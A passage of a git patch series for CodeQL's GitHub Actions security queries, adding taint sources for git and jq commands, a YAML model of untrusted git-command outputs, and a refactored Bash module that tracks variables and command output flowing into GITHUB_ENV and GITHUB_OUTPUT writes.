RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GitCommandSource() { + exists(Step checkout, string cmd_regex | + // This shoould be: + // source instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + ( + exists(Uses uses | + checkout = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) + ) + or + checkout instanceof GitMutableRefCheckout + or + checkout instanceof GitSHACheckout + or + checkout instanceof GhMutableRefCheckout + or + checkout instanceof GhSHACheckout + ) and + this.asExpr() = run.getScriptScalar() and + checkout.getAFollowingStep() = run and + run.getACommand() = cmd and + cmd.indexOf("git") = 0 and + untrustedGitCommandsDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex) + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + +class GitHubEventPathSource extends RemoteFlowSource, CommandSource { + string cmd; + string flag; + string access_path; + Run run; + + // Examples + // COMMENT_AUTHOR=$(jq -r .comment.user.login "$GITHUB_EVENT_PATH") + // CURRENT_COMMENT=$(jq -r .comment.body "$GITHUB_EVENT_PATH") + // PR_HEAD=$(jq --raw-output .pull_request.head.ref ${GITHUB_EVENT_PATH}) + // PR_NUMBER=$(jq --raw-output .pull_request.number ${GITHUB_EVENT_PATH}) + // PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + // BODY=$(jq -r '.issue.body' "$GITHUB_EVENT_PATH" | sed -n '3p') + GitHubEventPathSource() { + this.asExpr() = run.getScriptScalar() and + run.getACommand() = cmd and + cmd.matches("jq%") and + cmd.matches("%GITHUB_EVENT_PATH%") and + exists(string regexp | + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and + access_path = "github.event" + cmd.regexpCapture(".*\\s+([^\\s]+)\\s+.*", 1) and + normalizeExpr(access_path).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + class GitHubEventJsonSource extends RemoteFlowSource { string flag; @@ -104,10 +186,12 @@ class MaDSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } } +abstract class FileSource extends RemoteFlowSource { } + /** * A downloaded artifact. */ -class ArtifactSource extends RemoteFlowSource { +class ArtifactSource extends RemoteFlowSource, FileSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } @@ -116,8 +200,27 @@ class ArtifactSource extends RemoteFlowSource { /** * A file from an untrusted checkout. */ -private class CheckoutSource extends RemoteFlowSource { - CheckoutSource() { this.asExpr() instanceof PRHeadCheckoutStep } +private class CheckoutSource extends RemoteFlowSource, FileSource { + CheckoutSource() { + // This shoould be: + // source instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + exists(Uses u | + this.asExpr() = u and + u.getCallee() = "actions/checkout" and + exists(u.getArgument("ref")) + ) + or + this.asExpr() instanceof GitMutableRefCheckout + or + this.asExpr() instanceof GitSHACheckout + or + this.asExpr() instanceof GhMutableRefCheckout + or + this.asExpr() instanceof GhSHACheckout + } override string getSourceType() { result = "artifact" } } diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_commands.yml new file mode 100644 index 000000000000..0d6c9e3bfa0a --- /dev/null +++ b/ql/lib/ext/config/untrusted_git_commands.yml @@ -0,0 +1,32 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: untrustedGitCommandsDataModel + data: + # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) + - [".*git\\b.*\\bdiff-tree\\b.*", "filename,multiline"] + # CHANGES=$(git --no-pager diff --name-only $NAME | grep -v -f .droneignore); + # CHANGES=$(git diff --name-only) + - [".*git\\b.*\\bdiff\\b.*", "filename,multiline"] + # COMMIT_MESSAGE=$(git log --format=%s -n 1) + - [".*git\\b.*\\blog\\b.*%s.*", "text,online"] + # COMMIT_MESSAGE=$(git log --format=%B -n 1) + - [".*git\\b.*\\blog\\b.*%B.*", "text,multiline"] + # COMMIT_MESSAGE=$(git log --format=oneline) + - [".*git\\b.*\\blog\\b.*oneline.*", "text,oneline"] + # COMMIT_MESSAGE=$(git show -s --format=%B) + # COMMIT_MESSAGE=$(git show -s --format=%s) + - [".*git\\b.*\\bshow\\b.*-s.*%s.*", "text,oneline"] + - [".*git\\b.*\\bshow\\b.*-s.*%B.*", "text,multiline"] + # AUTHOR=$(git log -1 --pretty=format:'%an') + - [".*git\\b.*\\blog\\b.*%an.*", "username,oneline"] + # AUTHOR=$(git show -s --pretty=%an) + - [".*git\\b.*\\bshow\\b.*%an.*", "username,oneline"] + # EMAIL=$(git log -1 --pretty=format:'%ae') + - [".*git\\b.*\\blog\\b.*%ae.*", "email,oneline"] + # EMAIL=$(git show -s --pretty=%ae) + - [".*git\\b.*\\bshow\\b.*%ae.*", "email,oneline"] + # BRANCH=$(git branch --show-current) + - [".*git\\b.*\\bbranch\\b.*\\b--show-current\\b.*", "branch,oneline"] + # BRANCH=$(git rev-parse --abbrev-ref HEAD) + - [".*git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b.*", "branch,oneline"] From ee25f3565335dd4ee4e62188721adebb76a97b87 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:26 +0200 Subject: [PATCH 575/707] Refactor of Bash functions --- ql/lib/codeql/actions/Ast.qll | 16 + ql/lib/codeql/actions/Bash.qll | 364 ++++++++++++++++++ ql/lib/codeql/actions/Helper.qll | 239 +----------- ql/lib/codeql/actions/ast/internal/Ast.qll | 16 + .../security/ArgumentInjectionQuery.qll | 58 ++- .../security/ArtifactPoisoningQuery.qll | 18 + .../actions/security/CodeInjectionQuery.qll | 16 + .../security/EnvPathInjectionQuery.qll | 72 ++-- .../actions/security/EnvVarInjectionQuery.qll | 77 ++-- .../security/OutputClobberingQuery.qll | 134 ++++--- .../actions/security/PoisonableSteps.qll | 11 +- .../security/UntrustedCheckoutQuery.qll | 22 +- 12 files changed, 697 insertions(+), 346 deletions(-) create mode 100644 ql/lib/codeql/actions/Bash.qll diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 759bcf3f786a..cc29ceffe53b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -315,6 +315,22 @@ class Run extends Step instanceof RunImpl { } predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } + + predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + super.getAnEnvReachingGitHubOutputWrite(var, output_field) + } + + predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + super.getACmdReachingGitHubOutputWrite(cmd, output_field) + } + + predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + super.getAnEnvReachingGitHubEnvWrite(var, output_field) + } + + predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + super.getACmdReachingGitHubEnvWrite(cmd, output_field) + } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll new file mode 100644 index 000000000000..5907b601a46c --- /dev/null +++ b/ql/lib/codeql/actions/Bash.qll @@ -0,0 +1,364 @@ +private import codeql.actions.Ast +private import codeql.Locations +import codeql.actions.config.Config +private import codeql.actions.security.ControlChecks + +module Bash { + string stmtSeparator() { result = ";" } + + string commandSeparator() { result = ["&&", "||"] } + + string pipeSeparator() { result = "|" } + + string splitSeparators() { + result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + } + + string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate isCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = "\\$\\(([^)]+)\\)" and + cmd = expr.regexpCapture(regexp, 1) + or + // `cmd` + regexp = "`([^`]+)`" and + cmd = expr.regexpCapture(regexp, 1) + ) + } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate containsCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = ".*\\$\\(([^)]+)\\).*" and + cmd = expr.regexpCapture(regexp, 1) + or + // `cmd` + regexp = ".*`([^`]+)`.*" and + cmd = expr.regexpCapture(regexp, 1) + ) + } + + /** Checks if expr is a bash parameter expansion */ + bindingset[expr] + predicate isParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[expr] + predicate containsParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = ".*\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = ".*\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[raw_content] + predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) + } + + bindingset[script] + predicate singleLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) + } + + bindingset[script] + predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) + } + + bindingset[script] + predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 8) + ) + } + + bindingset[script] + predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string var_name | + regexp = + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + var_name = trimQuotes(script.regexpCapture(regexp, 3)).regexpReplaceAll("<<\\s*(\\S+)", "") and + content = + var_name + "=$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + .regexpReplaceAll(">>.*GITHUB_(ENV|OUTPUT)(})?", "") + .trim() + ")" and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" + ) + } + + bindingset[script] + predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string first_line, string var_name | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and + first_line = script.regexpCapture(regexp, 1).splitAt("\n", 0).trim() and + var_name = first_line.regexpCapture("echo\\s+('|\\\")?(.*)<<.*", 2) and + content = var_name + "=$(" + script.regexpCapture(regexp, 1).splitAt("\n").trim() + ")" and + not content.indexOf("EOF") > 0 and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + cmd = "echo" and + filters = "" + ) + } + + bindingset[script] + predicate multiLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) + } + + bindingset[script, file_var] + predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) + ) + } + + /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ + predicate fileToFileWrite(Run run, string file_var, string path) { + exists(string regexp, string stmt, string file_expr | + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + stmt = run.getAStmt() and + file_expr = trimQuotes(stmt.regexpCapture(regexp, 5)) and + path = stmt.regexpCapture(regexp, 2) and + containsParameterExpansion(file_expr, file_var, _, _) + ) + } + + predicate fileToGitHubEnv(Run run, string path) { fileToFileWrite(run, "GITHUB_ENV", path) } + + predicate fileToGitHubOutput(Run run, string path) { fileToFileWrite(run, "GITHUB_OUTPUT", path) } + + predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run, "GITHUB_PATH", path) } + + bindingset[snippet] + predicate outputsPartialFileContent(Run run, string snippet) { + // e.g. + // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + exists(int i, string line, string cmd | + run.getStmt(i) = line and + line.indexOf(snippet.regexpReplaceAll("^\\$\\(", "").regexpReplaceAll("\\)$", "")) > -1 and + run.getCommand(i) = cmd and + cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 + ) + } + + /** + * Holds if the Run scripts contains an access to an environment variable called `var` + * which value may get appended to the GITHUB_XXX special file + */ + predicate envReachingGitHubFileWrite(Run run, string var, string file_var, string field) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + run.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + run.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + run.getAWriteToGitHubPath(file_write_value) + ) and + envReachingRunExpr(run, var, file_write_value) + ) + } + + /** + * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ + bindingset[expr] + predicate envReachingRunExpr(Run run, string var, string expr) { + exists(string var2, string value2 | + // VAR2=${VAR:-default} (var2=value2) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + run.getAnAssignment(var2, value2) and + containsParameterExpansion(value2, var, _, _) and + containsParameterExpansion(expr, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=${VAR:-default}" >> $GITHUB_ENV (field, file_write_value) + containsParameterExpansion(expr, var, _, _) + } + + /** + * Holds if the Run scripts contains a command substitution (`cmd`) + * which output may get appended to the GITHUB_XXX special file + */ + predicate cmdReachingGitHubFileWrite(Run run, string cmd, string file_var, string field) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + run.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + run.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + run.getAWriteToGitHubPath(file_write_value) + ) and + ( + // cmd output is assigned to a second variable (var2) and var2 reaches the file write + exists(string var2, string value2 | + // VAR2=$(cmd) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + run.getAnAssignment(var2, value2) and + containsCmdSubstitution(value2, cmd) and + containsParameterExpansion(file_write_value, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) + containsCmdSubstitution(file_write_value, cmd) + ) + ) + } +} diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 688d62acbe17..ae4405a185bd 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -1,7 +1,8 @@ private import codeql.actions.Ast private import codeql.Locations -import codeql.actions.config.Config private import codeql.actions.security.ControlChecks +import codeql.actions.config.Config +import codeql.actions.Bash bindingset[expr] string normalizeExpr(string expr) { @@ -82,239 +83,3 @@ string normalizePath(string path) { */ bindingset[subpath, path] predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } - -module Bash { - string stmtSeparator() { result = ";" } - - string commandSeparator() { result = ["&&", "||"] } - - string pipeSeparator() { result = "|" } - - string splitSeparators() { - result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() - } - - string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } - - string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } - - /** Checks if expr is a bash parameter expansion */ - bindingset[expr] - predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { - exists(string regexp | - // $VAR - regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${VAR} - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${!VAR} - regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 2) and - operator = expr.regexpCapture(regexp, 1) and - params = "" - or - // ${VAR}, ... - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = expr.regexpCapture(regexp, 2) and - params = expr.regexpCapture(regexp, 3) - ) - } - - bindingset[raw_content] - predicate extractVariableAndValue(string raw_content, string key, string value) { - exists(string regexp, string content | content = trimQuotes(raw_content) | - regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and - key = trimQuotes(content.regexpCapture(regexp, 1)) and - value = trimQuotes(content.regexpCapture(regexp, 3)) - or - exists(string line | - line = content.splitAt("\n") and - regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and - key = trimQuotes(line.regexpCapture(regexp, 1)) and - value = trimQuotes(line.regexpCapture(regexp, 2)) - ) - ) - } - - bindingset[script] - predicate singleLineFileWrite( - string script, string cmd, string file, string content, string filters - ) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" and - content = script.regexpCapture(regexp, 2) - ) - } - - bindingset[script] - predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = script.regexpCapture(regexp, 4) and - value = trimQuotes(script.regexpCapture(regexp, 5)) - or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = "" and - value = trimQuotes(script.regexpCapture(regexp, 4)) - ) - } - - bindingset[script] - predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and - content = script.regexpCapture(regexp, 6) and - filters = "" - or - regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 7)) and - filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 8) - ) - } - - bindingset[script] - predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + - "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and - content = - trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + - trimQuotes(script.regexpCapture(regexp, 6)) + "\n" + - trimQuotes(script.regexpCapture(regexp, 4)) and - cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" - ) - } - - bindingset[script] - predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^\\s*\\{\\s*[\r\n]" + - // - "(.*?)" + - // - "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and - content = - script - .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - cmd = "echo" and - filters = "" - ) - } - - bindingset[script] - predicate multiLineFileWrite( - string script, string cmd, string file, string content, string filters - ) { - heredocFileWrite(script, cmd, file, content, filters) - or - linesFileWrite(script, cmd, file, content, filters) - or - blockFileWrite(script, cmd, file, content, filters) - } - - bindingset[script, file_var] - predicate extractFileWrite(string script, string file_var, string content) { - // single line assignment - exists(string file_expr, string raw_content | - isBashParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and - content = trimQuotes(raw_content) - ) - or - // workflow command assignment - exists(string key, string value, string cmd | - ( - file_var = "GITHUB_ENV" and - cmd = "set-env" and - content = key + "=" + value - or - file_var = "GITHUB_OUTPUT" and - cmd = "set-output" and - content = key + "=" + value - or - file_var = "GITHUB_PATH" and - cmd = "add-path" and - content = value - ) and - singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) - ) - or - // multiline assignment - exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and - isBashParameterExpansion(file_expr, file_var, _, _) and - content = trimQuotes(raw_content) - ) - } - - /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ - bindingset[script, file_var] - predicate fileToFileWrite(string script, string file_var, string path) { - exists(string regexp, string line, string file_expr | - isBashParameterExpansion(file_expr, file_var, _, _) and - regexp = - "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + - "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - line = script.splitAt("\n") and - path = line.regexpCapture(regexp, 2) and - file_expr = trimQuotes(line.regexpCapture(regexp, 5)) - ) - } - - predicate fileToGitHubEnv(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_ENV", path) - } - - predicate fileToGitHubOutput(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) - } - - predicate fileToGitHubPath(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_PATH", path) - } - - bindingset[snippet] - predicate outputsPartialFileContent(Run run, string snippet) { - // e.g. - // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - // Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - exists(int i, string line, string cmd | - run.getStmt(i) = line and - line.matches("%" + snippet + "%") and - run.getCommand(i) = cmd and - cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - ) - } -} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 30b57e361abd..a4b5778246a5 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1526,6 +1526,22 @@ class RunImpl extends StepImpl { predicate getAWriteToGitHubPath(string value) { Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) } + + predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) + } + + predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + } + + predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) + } + + predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) + } } /** diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 6e1a5c0f2293..18ff398ebab2 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,6 +9,23 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } +/** + * Holds if an environment variable is used, directly or indirectly, as an argument to 